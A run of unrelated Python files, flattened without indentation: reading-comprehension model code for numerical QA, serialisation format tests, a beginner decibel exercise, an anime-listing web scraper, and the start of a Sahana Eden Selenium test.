segment_ids.append(1)
tokens.append("[SEP]")
segment_ids.append(1)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
input_mask = [1] * len(input_ids)
number_indices = []
doc_offset = len(all_que_tokens) + 2
que_offset = 1
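# The sequence layout is [CLS] question [SEP] passage [SEP], so a passage
# token at position i lands at i + len(all_que_tokens) + 2 (doc_offset),
# while a question token at position j lands at j + 1 (que_offset).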
for tok_number_index in tok_number_indices:
if tok_number_index != -1:
number_index = tok_number_index + doc_offset
number_indices.append(number_index)
else:
number_indices.append(-1)
start_indices, end_indices, add_sub_expressions, input_counts, negations, number_of_answers = [], [], [], [], [], []
if is_train:
# For distant supervision, we annotate the positions of all answer spans
if passage_tok_start_positions != [] and passage_tok_end_positions !=[]:
for tok_start_position, tok_end_position in zip(passage_tok_start_positions, passage_tok_end_positions):
start_position = tok_start_position + doc_offset
end_position = tok_end_position + doc_offset
start_indices.append(start_position)
end_indices.append(end_position)
elif query_tok_start_positions != [] and query_tok_end_positions !=[]:
for tok_start_position, tok_end_position in zip(query_tok_start_positions, query_tok_end_positions):
start_position = tok_start_position + que_offset
end_position = tok_end_position + que_offset
start_indices.append(start_position)
end_indices.append(end_position)
# Weakly-supervised for addition-subtraction
if example.add_sub_expressions != []:
for add_sub_expression in example.add_sub_expressions:
# Since we have truncated the passage, the expression should also be truncated
if sum(add_sub_expression[:len(number_indices)]) >= 2:
assert len(add_sub_expression[:len(number_indices)]) == len(number_indices)
add_sub_expressions.append(add_sub_expression[:len(number_indices)])
# Weakly-supervised for counting
for count in example.counts:
input_counts.append(count)
# Weakly-supervised for negation
if example.negations != []:
for negation in example.negations:
if sum(negation[:len(number_indices)]) == 1:
assert len(negation[:len(number_indices)]) == len(number_indices)
negations.append(negation[:len(number_indices)])
is_impossible = True
if "span_extraction" in answering_abilities and start_indices != [] and end_indices != []:
is_impossible = False
assert example.number_of_answer is not None
number_of_answers.append(example.number_of_answer - 1)
if "negation" in answering_abilities and negations != []:
is_impossible = False
if "addition_subtraction" in answering_abilities and add_sub_expressions != []:
is_impossible = False
if "counting" in answering_abilities and input_counts != []:
is_impossible = False
if start_indices == [] and end_indices == [] and number_of_answers == []:
start_indices.append(-1)
end_indices.append(-1)
number_of_answers.append(-1)
if negations == []:
negations.append([-1] * len(number_indices))
if add_sub_expressions == []:
add_sub_expressions.append([-1] * len(number_indices))
if input_counts == []:
input_counts.append(-1)
if not is_impossible:
features.append(InputFeatures(
unique_id=unique_id,
example_index=example_index,
tokens=tokens,
que_token_to_orig_map=que_token_to_orig_map,
doc_token_to_orig_map=doc_token_to_orig_map,
input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
number_indices=number_indices,
start_indices=start_indices,
end_indices=end_indices,
number_of_answers=number_of_answers,
add_sub_expressions=add_sub_expressions,
input_counts=input_counts,
negations=negations))
unique_id += 1
else:
skip_count += 1
else:
features.append(InputFeatures(
unique_id=unique_id,
example_index=example_index,
tokens=tokens,
que_token_to_orig_map=que_token_to_orig_map,
doc_token_to_orig_map=doc_token_to_orig_map,
input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
number_indices=number_indices))
unique_id += 1
if len(features) % 5000 == 0:
logger.info("Processing features: %d" % (len(features)))
logger.info(f"Skipped {skip_count} features, truncated {truncate_count} features, kept {len(features)} features.")
return features
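# A minimal usage sketch (names hypothetical; the tokenizer is assumed to be
# a BERT-style wordpiece tokenizer):
#   features = convert_examples_to_features(
#       examples, tokenizer, max_seq_length=512, is_train=True,
#       answering_abilities=["span_extraction", "addition_subtraction",
#                            "counting", "negation"],
#       logger=logger)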
def wrapped_get_final_text(example, feature, start_index, end_index, do_lower_case, verbose_logging, logger):
if start_index in feature.doc_token_to_orig_map and end_index in feature.doc_token_to_orig_map:
orig_doc_start = feature.doc_token_to_orig_map[start_index]
orig_doc_end = feature.doc_token_to_orig_map[end_index]
orig_tokens = example.passage_tokens[orig_doc_start:(orig_doc_end + 1)]
elif start_index in feature.que_token_to_orig_map and end_index in feature.que_token_to_orig_map:
orig_que_start = feature.que_token_to_orig_map[start_index]
orig_que_end = feature.que_token_to_orig_map[end_index]
orig_tokens = example.question_tokens[orig_que_start:(orig_que_end + 1)]
else:
return None
tok_tokens = feature.tokens[start_index:(end_index + 1)]
tok_text = " ".join(tok_tokens)
# De-tokenize WordPieces that have been split off.
tok_text = tok_text.replace(" ##", "")
tok_text = tok_text.replace("##", "")
# Clean whitespace
tok_text = tok_text.strip()
tok_text = " ".join(tok_text.split())
orig_text = " ".join(orig_tokens)
final_text = get_final_text(tok_text, orig_text, do_lower_case, verbose_logging, logger)
return final_text
def add_sub_beam_search(example, feature, result, is_training, beam_size, max_count):
number_sign_logits = result['number_sign_logits'] # [L, 3]
number_mask = result['number_mask'] # [L]
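# beam_search (defined elsewhere) is assumed to return the top-scoring
# candidate expressions: per candidate, the chosen number positions, their
# sign indices (decoded via sign_remap, presumably {0: 0, 1: +1, 2: -1} to
# mirror the annotation-time labels), and a per-candidate score.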
number_indices_list, sign_indices_list, scores_list = beam_search(number_sign_logits, number_mask, beam_size, max_count)
number_sign_labels = []
if is_training:
if number_indices_list != [] and sign_indices_list != []:
for number_indices, sign_indices in zip(number_indices_list, sign_indices_list):
pred_answer = sum([example.numbers_in_passage[number_index] * sign_remap[sign_index]
for number_index, sign_index in zip(number_indices, sign_indices)])
pred_answer = float(Decimal(pred_answer).quantize(Decimal('0.0000')))
ground_truth_answer_strings = [answer_json_to_strings(annotation)[0] for annotation in
example.answer_annotations]
exact_match, _ = metric_max_over_ground_truths(
drop_em_and_f1, str(pred_answer), ground_truth_answer_strings)
number_sign_labels.append(exact_match)
# Pad to fixed length
for number_indices, sign_indices in zip(number_indices_list, sign_indices_list):
while len(number_indices) < max_count:
number_indices.append(-1)
sign_indices.append(-1)
while len(number_indices_list) < beam_size:
number_indices_list.append([-1] * max_count)
sign_indices_list.append([-1] * max_count)
scores_list.append(0)
if is_training:
number_sign_labels.append(0)
# Add ground truth expressions if there is no positive label
if is_training and max(number_sign_labels) == 0:
gold_number_indices, gold_sign_indices = [], []
add_sub_expression = choice(feature.add_sub_expressions)
for number_index, sign_index in enumerate(add_sub_expression):
if sign_index > 0 and number_mask[number_index]:
gold_number_indices.append(number_index)
gold_sign_indices.append(sign_index)
while len(gold_number_indices) < max_count:
gold_number_indices.append(-1)
gold_sign_indices.append(-1)
number_indices_list[-1] = gold_number_indices
sign_indices_list[-1] = gold_sign_indices
number_sign_labels[-1] = 1
return number_indices_list, sign_indices_list, number_sign_labels, scores_list
def batch_annotate_candidates(all_examples, batch_features, batch_results, answering_abilities,
is_training, beam_size, max_count):
"""Annotate top-k candidate answers into features."""
unique_id_to_result = {}
for result in batch_results:
unique_id_to_result[result['unique_id']] = result
batch_number_indices, batch_sign_indices, batch_sign_labels, batch_scores = [], [], [], []
for (feature_index, feature) in enumerate(batch_features):
example = all_examples[feature.example_index]
result = unique_id_to_result[feature.unique_id]
number_indices, sign_indices, sign_labels, scores = None, None, None, None
if is_training:
if feature.add_sub_expressions != [[-1] * len(feature.number_indices)]:
number_indices, sign_indices, sign_labels, scores = add_sub_beam_search(example, feature, result,
is_training, beam_size, max_count)
else:
predicted_ability = result['predicted_ability']
predicted_ability_str = answering_abilities[predicted_ability]
if predicted_ability_str == "addition_subtraction":
number_indices, sign_indices, sign_labels, scores = add_sub_beam_search(example, feature, result,
is_training, beam_size, max_count)
if number_indices is None and sign_indices is None and sign_labels is None and scores is None:
number_indices, sign_indices, sign_labels, scores = [], [], [], []
while len(number_indices) < beam_size:
number_indices.append([-1] * max_count)
sign_indices.append([-1] * max_count)
sign_labels.append(0)
scores.append(0)
batch_number_indices.append(number_indices)
batch_sign_indices.append(sign_indices)
batch_sign_labels.append(sign_labels)
batch_scores.append(scores)
return batch_number_indices, batch_sign_indices, batch_sign_labels, batch_scores
def write_predictions(all_examples, all_features, all_results, answering_abilities, drop_metrics, length_heuristic,
n_best_size, max_answer_length, do_lower_case, verbose_logging, logger):
"""Write final predictions to the json file."""
example_index_to_features = collections.defaultdict(list)
for feature in all_features:
example_index_to_features[feature.example_index].append(feature)
unique_id_to_result = {}
for result in all_results:
unique_id_to_result[result['unique_id']] = result
_PrelimPrediction = collections.namedtuple( # pylint: disable=invalid-name
"PrelimPrediction",
["start_index", "end_index", "start_logit", "end_logit", "rerank_logit", "heuristic_logit"])
all_nbest_json = collections.OrderedDict()
for (example_index, example) in enumerate(all_examples):
features = example_index_to_features[example_index]
assert len(features) == 1
feature = features[0]
result = unique_id_to_result[feature.unique_id]
predicted_ability = result['predicted_ability']
predicted_ability_str = answering_abilities[predicted_ability]
nbest_json, predicted_answers = [], []
if predicted_ability_str == "addition_subtraction":
max_prob, best_answer = 0, None
sign_rerank_probs = _compute_softmax(result['sign_rerank_logits'])
for number_indices, sign_indices, rerank_prob, prob in zip(result['number_indices2'], result['sign_indices'], sign_rerank_probs, result['sign_probs']):
pred_answer = sum([sign_remap[sign_index] * example.numbers_in_passage[number_index] for sign_index, number_index in zip(sign_indices, number_indices) if sign_index != -1 and number_index != -1])
pred_answer = str(float(Decimal(pred_answer).quantize(Decimal('0.0000'))))
if rerank_prob*prob > max_prob:
max_prob = rerank_prob*prob
best_answer = pred_answer
assert best_answer is not None
predicted_answers.append(best_answer)
output = collections.OrderedDict()
output["text"] = str(best_answer)
output["type"] = "addition_subtraction"
nbest_json.append(output)
elif predicted_ability_str == "counting":
predicted_answers.append(str(result['predicted_count']))
output = collections.OrderedDict()
output["text"] = str(result['predicted_count'])
output["type"] = "counting"
nbest_json.append(output)
elif predicted_ability_str == "negation":
index = np.argmax(result['predicted_negations'])
pred_answer = 100 - example.numbers_in_passage[index]
pred_answer = float(Decimal(pred_answer).quantize(Decimal('0.0000')))
predicted_answers.append(str(pred_answer))
output = collections.OrderedDict()
output["text"] = str(pred_answer)
output["type"] = "negation"
nbest_json.append(output)
elif predicted_ability_str == "span_extraction":
number_of_spans = result['predicted_spans']
prelim_predictions = []
start_indexes = _get_best_indexes(result['start_logits'], n_best_size)
end_indexes = _get_best_indexes(result['end_logits'], n_best_size)
for start_index in start_indexes:
for end_index in end_indexes:
# We could hypothetically create invalid predictions, e.g., indices that
# fall outside the mapped question/passage tokens or spans that end
# before they start. We throw out all invalid predictions.
if start_index >= len(feature.tokens):
continue
if end_index >= len(feature.tokens):
continue
if start_index not in feature.que_token_to_orig_map and start_index not in feature.doc_token_to_orig_map:
continue
if end_index not in feature.que_token_to_orig_map and end_index not in feature.doc_token_to_orig_map:
continue
if end_index < start_index:
continue
length = end_index - start_index + 1
if length > max_answer_length:
continue
start_logit = result['start_logits'][start_index]
end_logit = result['end_logits'][end_index]
heuristic_logit = start_logit + end_logit \
- length_heuristic * (end_index - start_index + 1)
prelim_predictions.append(
_PrelimPrediction(
start_index=start_index,
end_index=end_index,
start_logit=start_logit,
end_logit=end_logit,
rerank_logit=0,
heuristic_logit=heuristic_logit))
prelim_predictions = sorted(prelim_predictions, key=lambda x: (x.heuristic_logit), reverse=True)
_NbestPrediction = collections.namedtuple( # pylint: disable=invalid-name
"NbestPrediction", ["text", "start_logit", "end_logit", "start_index", "end_index", "rerank_logit", "heuristic_logit"])
seen_predictions = {}
nbest = []
for i, pred_i in enumerate(prelim_predictions):
if len(nbest) >= n_best_size:
break
final_text = wrapped_get_final_text(example, feature, pred_i.start_index, pred_i.end_index,
do_lower_case, verbose_logging, logger)
if final_text in seen_predictions or final_text is None:
continue
seen_predictions[final_text] = True
nbest.append(
_NbestPrediction(
text=final_text,
start_logit=pred_i.start_logit,
end_logit=pred_i.end_logit,
start_index=pred_i.start_index,
end_index=pred_i.end_index,
rerank_logit=pred_i.rerank_logit,
heuristic_logit=pred_i.heuristic_logit
))
# filter out redundant candidates
if (i + 1) < len(prelim_predictions):
indexes = []
for j, pred_j in enumerate(prelim_predictions[(i + 1):]):
filter_text = wrapped_get_final_text(example, feature, pred_j.start_index, pred_j.end_index,
do_lower_case, verbose_logging, logger)
if filter_text is None:
indexes.append(i + j + 1)
else:
if calculate_f1(final_text, filter_text) > 0:
indexes.append(i + j + 1)
for k, index in enumerate(indexes):
    prelim_predictions.pop(index - k)
# In very rare edge cases we could have no valid predictions. So we
# just create a nonce prediction in this case to avoid failure.
if not nbest:
nbest.append(
_NbestPrediction(text="empty", start_logit=0.0, end_logit=0.0, start_index=0.0, end_index=0.0,
rerank_logit=0., heuristic_logit=0.))
assert len(nbest) >= 1
for i, entry in enumerate(nbest):
if i > number_of_spans:
break
predicted_answers.append(entry.text)
output = collections.OrderedDict()
output["text"] = entry.text
output["type"] = "span_extraction"
nbest_json.append(output)
else:
raise ValueError(f"Unsupported answer ability: {predicted_ability_str}")
assert len(nbest_json) >= 1 and len(predicted_answers) >= 1
if example.answer_annotations:
drop_metrics(predicted_answers, example.answer_annotations)
ground_truth_answer_strings = [answer_json_to_strings(annotation)[0]
for annotation in example.answer_annotations]
em, f1 = metric_max_over_ground_truths(drop_em_and_f1, predicted_answers, ground_truth_answer_strings)
for output in nbest_json:
output["f1"] = f1
output["em"] = em
all_nbest_json[example.qas_id] = nbest_json
exact_match, f1_score = drop_metrics.get_metric(reset=True)
return all_nbest_json, {'em': exact_match, 'f1': f1_score}
class ListBatcher(object):
def get_epoch(self, data: List):
raise NotImplementedError()
def get_batch_size(self):
""" Return the batch size """
raise NotImplementedError()
def epoch_size(self, n_elements):
raise NotImplementedError()
class ExampleLenKey(object):
def __call__(self, d: DropExample):
return len(d.passage_tokens) + len(d.question_tokens)
class FeatureLenKey(object):
def __call__(self, d: InputFeatures):
return len(d.input_ids)
class ClusteredBatcher(ListBatcher):
def __init__(self,
batch_size: int,
clustering: Callable,
truncate_batches=False):
self.batch_size = batch_size
self.clustering = clustering
self.truncate_batches = truncate_batches
def get_batch_size(self):
return self.batch_size
def get_epoch(self, data: List):
data = sorted(data, key=self.clustering)
n_batches = len(data) // self.batch_size
intervals = [(i * self.batch_size, (i + 1) * self.batch_size) for i in range(0, n_batches)]
remainder = len(data) % self.batch_size
if self.truncate_batches and remainder > 0:
intervals.append((len(data) - remainder, len(data)))
np.random.shuffle(intervals)
for i, j in intervals:
yield data[i:j]
def epoch_size(self, n_elements):
size = n_elements // self.batch_size
if self.truncate_batches and (n_elements % self.batch_size) > 0:
size += 1
return size
class FixedOrderBatcher(ListBatcher):
def __init__(self, batch_size: int, truncate_batches=False):
self.batch_size = batch_size
self.truncate_batches = truncate_batches
def get_batch_size(self):
return self.batch_size
def get_epoch(self, data: List):
n_batches = len(data) // self.batch_size
for i in range(n_batches):
yield data[i*self.batch_size:(i + 1)*self.batch_size]
if self.truncate_batches and (len(data) % self.batch_size) > 0:
yield data[self.batch_size * (len(data) // self.batch_size):]
def epoch_size(self, n_elements):
size = n_elements // self.batch_size
if self.truncate_batches and (n_elements % self.batch_size) > 0:
size += 1
return size
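# A minimal usage sketch (hypothetical data): cluster features of similar
# length to reduce padding waste, then iterate one shuffled epoch.
#   batcher = ClusteredBatcher(batch_size=16, clustering=FeatureLenKey(),
#                              truncate_batches=True)
#   for batch in batcher.get_epoch(features):
#       tensors = get_tensors(batch, is_train=True)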
def get_tensors_list(batch, is_train, gra_acc_steps, max_seq_length):
input_len = np.array([len(feature.input_ids) for feature in batch], dtype='int32')
max_input_len = input_len.max()
mini_batch_size = int(len(batch) / gra_acc_steps)
batchs_list, tensors_list = [], []
if max_input_len > max_seq_length / gra_acc_steps and mini_batch_size > 0:
mini_batching = ClusteredBatcher(mini_batch_size, FeatureLenKey(), truncate_batches=True)
for mini_batch in mini_batching.get_epoch(batch):
tensors_list.append(get_tensors(mini_batch, is_train))
batchs_list.append(mini_batch)
else:
tensors_list.append(get_tensors(batch, is_train))
batchs_list.append(batch)
return batchs_list, tensors_list
def get_tensors(batch, is_train):
input_len = np.array([len(feature.input_ids) for feature in batch], dtype='int32')
max_input_len = input_len.max()
number_indices_len = np.array([len(feature.number_indices) for feature in batch], dtype='int32')
max_number_indices_len = number_indices_len.max()
if is_train:
start_indices_len = np.array([len(feature.start_indices) for feature in batch], dtype='int32')
max_start_indices_len = start_indices_len.max()
input_counts_len = np.array([len(feature.input_counts) for feature in batch], dtype='int32')
max_input_counts_len = input_counts_len.max()
number_of_answers_len = np.array([len(feature.number_of_answers) for feature in batch], dtype='int32')
max_number_of_answers_len = number_of_answers_len.max()
add_sub_combination_len, negation_combination_len = [], []
for feature in batch:
add_sub_combination_len.append(len(feature.add_sub_expressions))
negation_combination_len.append(len(feature.negations))
max_add_sub_combination_len = np.array(add_sub_combination_len).max()
max_negation_combination_len = np.array(negation_combination_len).max()
input_ids_list, input_mask_list, segment_ids_list, number_indices_list = [], [], [], []
if is_train:
start_indices_list, end_indices_list, number_of_answers_list, input_counts_list, add_sub_expressions_list, \
negations_list = [], [], [], [], [], []
for feature in batch:
input_ids = copy.deepcopy(feature.input_ids)
input_mask = copy.deepcopy(feature.input_mask)
segment_ids = copy.deepcopy(feature.segment_ids)
# Zero-pad up to the max mini-batch sequence length.
while len(input_ids) < max_input_len:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
input_ids_list.append(input_ids)
input_mask_list.append(input_mask)
segment_ids_list.append(segment_ids)
number_indices = copy.deepcopy(feature.number_indices)
while len(number_indices) < max_number_indices_len:
number_indices.append(-1)
number_indices_list.append(number_indices)
if is_train:
start_indices = copy.deepcopy(feature.start_indices)
end_indices = copy.deepcopy(feature.end_indices)
number_of_answers = copy.deepcopy(feature.number_of_answers)
input_counts = copy.deepcopy(feature.input_counts)
add_sub_expressions = copy.deepcopy(feature.add_sub_expressions)
negations = copy.deepcopy(feature.negations)
while len(start_indices) < max_start_indices_len:
start_indices.append(-1)
end_indices.append(-1)
while len(input_counts) < max_input_counts_len:
input_counts.append(-1)
while len(number_of_answers) < max_number_of_answers_len:
number_of_answers.append(-1)
new_add_sub_expressions = []
for add_sub_expression in add_sub_expressions:
while len(add_sub_expression) < max_number_indices_len:
add_sub_expression.append(-1)
new_add_sub_expressions.append(add_sub_expression)
while len(new_add_sub_expressions) < max_add_sub_combination_len:
new_add_sub_expressions.append([-1] * max_number_indices_len)
new_negations = []
for negation in negations:
while len(negation) < max_number_indices_len:
negation.append(-1)
new_negations.append(negation)
while len(new_negations) < max_negation_combination_len:
new_negations.append([-1] * max_number_indices_len)
start_indices_list.append(start_indices)
end_indices_list.append(end_indices)
number_of_answers_list.append(number_of_answers)
input_counts_list.append(input_counts)
add_sub_expressions_list.append(new_add_sub_expressions)
negations_list.append(new_negations)
batch_input_ids = torch.tensor(input_ids_list, dtype=torch.long)
batch_input_mask = torch.tensor(input_mask_list, dtype=torch.long)
batch_segment_ids = torch.tensor(segment_ids_list, dtype=torch.long)
batch_number_indices = torch.tensor(number_indices_list, dtype=torch.long)
if is_train:
batch_start_indices = torch.tensor(start_indices_list, dtype=torch.long)
batch_end_indices = torch.tensor(end_indices_list, dtype=torch.long)
batch_number_of_answers = torch.tensor(number_of_answers_list, dtype=torch.long)
batch_input_counts = torch.tensor(input_counts_list, dtype=torch.long)
batch_add_sub_expressions = torch.tensor(add_sub_expressions_list, dtype=torch.long)
batch_negations = torch.tensor(negations_list, dtype=torch.long)
return batch_input_ids, batch_input_mask, batch_segment_ids, batch_number_indices, batch_start_indices, \
batch_end_indices, batch_number_of_answers, batch_input_counts, batch_add_sub_expressions, batch_negations
else:
return batch_input_ids, batch_input_mask, batch_segment_ids, batch_number_indices
|
from datetime import date, datetime, time
from unittest2 import TestCase
from urllib import unquote
from scheme.formats import *
class TestStructuredText(TestCase):
def assert_correct(self, pairs):
for unserialized, serialized in pairs:
self.assertEqual(StructuredText.serialize(unserialized), serialized)
self.assertEqual(StructuredText.unserialize(serialized), unserialized)
def test_booleans(self):
self.assert_correct([
(True, 'true'),
(False, 'false'),
])
self.assertEqual(StructuredText.unserialize('True'), True)
self.assertEqual(StructuredText.unserialize('False'), False)
def test_mappings(self):
self.assert_correct([
({}, '{}'),
({'b': '1'}, '{b:1}'),
({'b': '1', 'c': '2'}, '{b:1,c:2}'),
({'b': True}, '{b:true}'),
({'b': 'a:b'}, '{b:a:b}'),
])
def test_sequences(self):
self.assert_correct([
([], '[]'),
(['1'], '[1]'),
(['1', '2'], '[1,2]'),
([True, False], '[true,false]'),
])
def test_nested_structures(self):
self.assert_correct([
({'b': {}}, '{b:{}}'),
(['1', '2', ['3', []]], '[1,2,[3,[]]]'),
([True, {'b': [False, '1']}], '[true,{b:[false,1]}]'),
])
def test_parsing_numbers(self):
self.assertEqual(StructuredText.unserialize('1', True), 1)
self.assertEqual(StructuredText.unserialize('{b:1.2}', True), {'b': 1.2})
def test_parsing_escape_characters(self):
self.assert_correct([
('{', '\{'),
('}', '\}'),
('{}', '\{\}'),
('{a}', '\{a\}'),
])
self.assert_correct([
('[', '\['),
(']', '\]'),
('[]', '\[\]'),
('[a]', '\[a\]'),
])
self.assert_correct([
({'b': '{}'}, '{b:\{\}}'),
({'b': '[]'}, '{b:\[\]}'),
({'a': '[]', 'b': '{}', 'c': '1', 'd': [], 'e': {}}, '{a:\[\],b:\{\},c:1,d:[],e:{}}'),
])
self.assert_correct([
(['{}'], '[\{\}]'),
(['[]'], '[\[\]]'),
(['{}', '[]', 'b', [], {}], '[\{\},\[\],b,[],{}]'),
])
self.assert_correct([
(r'\\', r'\\'),
(r'\\b', r'\\b'),
])
SINGLE_DICT = """a: 1
b: true
c: something"""
DICT_WITHIN_DICT = """a:
b: 1
c: true
d:
e: 2
f: false"""
SINGLE_LIST = """- 1
- 2
- 3"""
LIST_WITHIN_LIST = """- - 1
- 2
- - 3
- 4"""
DICT_WITHIN_LIST = """- a: 1
b: true
- a: 2
b: false"""
LIST_WITHIN_DICT = """a:
- 1
- 2
b:
- 3
- 4"""
class TestYaml(TestCase):
def assert_correct(self, pairs):
for unserialized, serialized in pairs:
self.assertEqual(Yaml.serialize(unserialized), serialized)
self.assertEqual(Yaml.unserialize(serialized), unserialized)
def assert_serializes(self, unserialized, serialized):
self.assertEqual(Yaml.serialize(unserialized), serialized)
def _test_simple_values(self):
self.assert_correct([
(None, 'null'),
(True, 'true'),
(False, 'false'),
(1, '1'),
(1.0, '1.0'),
(date(2000, 1, 1), '2000-01-01'),
(datetime(2000, 1, 1, 0, 0, 0), '2000-01-01 00:00:00'),
])
def _test_required_quotes(self):
self.assert_correct([
('', "''"),
('null', "'null'"),
('Null', "'Null'"),
('NULL', "'NULL'"),
('~', "'~'"),
('true', "'true'"),
('True', "'True'"),
('TRUE', "'TRUE'"),
('false', "'false'"),
('False', "'False'"),
('FALSE', "'FALSE'"),
])
def _test_empty_values(self):
self.assert_correct([
({}, '{}'),
([], '[]'),
])
self.assert_serializes(set(), '[]')
self.assert_serializes((), '[]')
def _test_complex_values(self):
self.assert_correct([
({'a': 1, 'b': True, 'c': 'something'}, SINGLE_DICT),
({'a': {'b': 1, 'c': True}, 'd': {'e': 2, 'f': False}}, DICT_WITHIN_DICT),
([1, 2, 3], SINGLE_LIST),
([[1, 2], [3, 4]], LIST_WITHIN_LIST),
([{'a': 1, 'b': True}, {'a': 2, 'b': False}], DICT_WITHIN_LIST),
({'a': [1, 2], 'b': [3, 4]}, LIST_WITHIN_DICT),
])
self.assert_serializes((1, 2, 3), SINGLE_LIST)
class TestUrlEncoded(TestCase):
def assert_correct(self, pairs):
for unserialized, serialized in pairs:
self.assertEqual(unquote(UrlEncoded.serialize(unserialized)), serialized)
self.assertEqual(UrlEncoded.unserialize(serialized), unserialized)
def test_invalid_data(self):
self.assertRaises(ValueError, lambda: UrlEncoded.serialize(True))
self.assertRaises(ValueError, lambda: UrlEncoded.unserialize(True))
def test_booleans(self):
self.assert_correct([
({'a': True}, 'a=true'),
({'a': False}, 'a=false'),
])
def test_mappings(self):
self.assert_correct([
({'a': {}}, 'a={}'),
({'a': {'b': '1'}}, 'a={b:1}'),
({'a': {'b': '1', 'c': '2'}}, 'a={b:1,c:2}'),
({'a': {'b': True}}, 'a={b:true}'),
])
def test_sequences(self):
self.assert_correct([
({'a': []}, 'a=[]'),
({'a': ['1']}, 'a=[1]'),
({'a': ['1', '2']}, 'a=[1,2]'),
({'a': [True]}, 'a=[true]'),
])
def test_nested_structures(self):
self.assert_correct([
({'a': {'b': {}}}, 'a={b:{}}'),
({'a': ['1', '2', ['3', []]]}, 'a=[1,2,[3,[]]]'),
({'a': [True, {'b': [False, '1']}]}, 'a=[true,{b:[false,1]}]'),
])
def test_escaped_characters(self):
self.assert_correct([
({'a': {'b': '{}'}}, 'a={b:\{\}}'),
({'a': '{b:c}'}, 'a=\{b:c\}'),
({'a': ['1', '2', ['3', '[]']]}, 'a=[1,2,[3,\[\]]]'),
({'a': ['1', '2', '[', '4']}, 'a=[1,2,\[,4]'),
({'a': ['{}', {}, '[]', []]}, 'a=[\{\},{},\[\],[]]'),
])
class TestXml(TestCase):
def assert_correct(self, pairs):
for unserialized, serialized in pairs:
self.assertEqual(Xml.serialize(unserialized, preamble=False), serialized)
self.assertEqual(Xml.unserialize(serialized), unserialized)
def assert_serializes(self, unserialized, serialized):
self.assertEqual(Xml.serialize(unserialized, preamble=False), serialized)
def test_simple_values(self):
self.assert_correct([
(None, '<root>null</root>'),
(True, '<root>true</root>'),
(False, '<root>false</root>'),
(1, '<root>1</root>'),
(1.0, '<root>1.0</root>'),
('testing', '<root>testing</root>'),
('', '<root />'),
])
def test_empty_values(self):
self.assert_correct([
({}, '<root type="struct" />'),
([], '<root type="list" />'),
])
self.assert_serializes(set(), '<root type="list" />')
self.assert_serializes((), '<root type="list" />')
def test_complex_values(self):
self.assert_correct([
({'a': 1, 'b': True, 'c': 'something'}, '<root><a>1</a><b>true</b><c>something</c></root>'),
({'a': {'b': 1, 'c': True}, 'd': {'e': 2, 'f': False}},
'<root><a><b>1</b><c>true</c></a><d><e>2</e><f>false</f></d></root>'),
([1, 2, 3], '<root><_>1</_><_>2</_><_>3</_></root>'),
([[1, 2], [3, 4]], '<root><_><_>1</_><_>2</_></_><_><_>3</_><_>4</_></_></root>'),
([{'a': 1, 'b': True}, {'a': 2, 'b': False}],
'<root><_><a>1</a><b>true</b></_><_><a>2</a><b>false</b></_></root>'),
({'a': [1, 2], 'b': [3, 4]}, '<root><a><_>1</_><_>2</_></a><b><_>3</_><_>4</_></b></root>'),
])
self.assert_serializes((1, 2, 3), '<root><_>1</_><_>2</_><_>3</_></root>')
|
#39 Sound Levels
# Ask for the decibel level of the noise
x = float(input("Enter the decibel level of noise = "))
if x == 130:
print("Jackhammer.")
elif x == 106:
print("Gas lawnmower.")
elif x == 70:
print("Alarm clock.")
elif x <= 40:
print("Quiet room.")
elif 130 > x > 106:
print("Jackhammer or gas lawnmower.")
elif 106 > x > 70:
print("Gas lawnmower or alarm clock.")
elif 70 > x > 40:
print("Alarm clock or quiet room.")
elif x > 130:
print("Jackhammer")
|
# Copyright © 2021 TerminalWarlord
# Encoding = 'utf-8'
# Licensed under MIT License
# https://github.com/TerminalWarlord/
import requests
from bs4 import BeautifulSoup as bs
def latestepisodes():
    animesjson = []
    # The three recent-release feeds share identical markup, so scrape each
    # type parameter (1, 2, 3) with the same extraction logic.
    for release_type in (1, 2, 3):
        r = requests.get('https://ajax.gogo-load.com/ajax/page-recent-release.html?page=1&type=%d' % release_type)
        soup = bs(r.text, "html.parser")
        animes = soup.find("ul", {"class": "items"}).find_all("li")
        for anime in animes:
            item = {
                'title': anime.find("p", {"class": "name"}).find("a").text.strip() + " " + anime.find("p", {"class": "episode"}).text.strip(),
                'image': anime.find("div", {"class": "img"}).find("img").attrs['src'],
                'url': "https://gogoanime.pe" + anime.find("div", {"class": "img"}).find("a").attrs['href']
            }
            animesjson.append(item)
    return animesjson
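# Example usage (requires network access; the endpoints above may change):
#   for episode in latestepisodes()[:3]:
#       print(episode['title'], '->', episode['url'])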
|
""" Sahana Eden Module Automated Tests - HRM006 Add Staff To Office
@copyright: 2011-2012 (c) Sahana Software Foundation
@license: MIT
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
from tests.web2unittest import SeleniumUnitTest
from tests import *
#import unittest, re, time
class AddStaffToOffice(SeleniumUnitTest):
def test_hrm006_add_staff_to_office(self):
"""
@case: HRM006
@description: Add a premade staff member to an Office
@TestDoc: https://docs.google.com/spreadsheet/ccc?key=0AmB3hMcgB-3idG1XNGhhRG9QWF81dUlKLXpJaFlCMFE
@Test Wiki: http://eden.sahanafoundation.org/wiki/DeveloperGuidelines/Testing
"""
browser = self.browser
config = self.config
self.login(account="admin", nexturl="org/office")
self.dt_filter("AP Zone")
self.dt_action()
url = browser.current_url
url_parts = url.split("/")
try:
org_id = int(url_parts[-2])
except (IndexError, ValueError):
org_id = int(url_parts[-1])
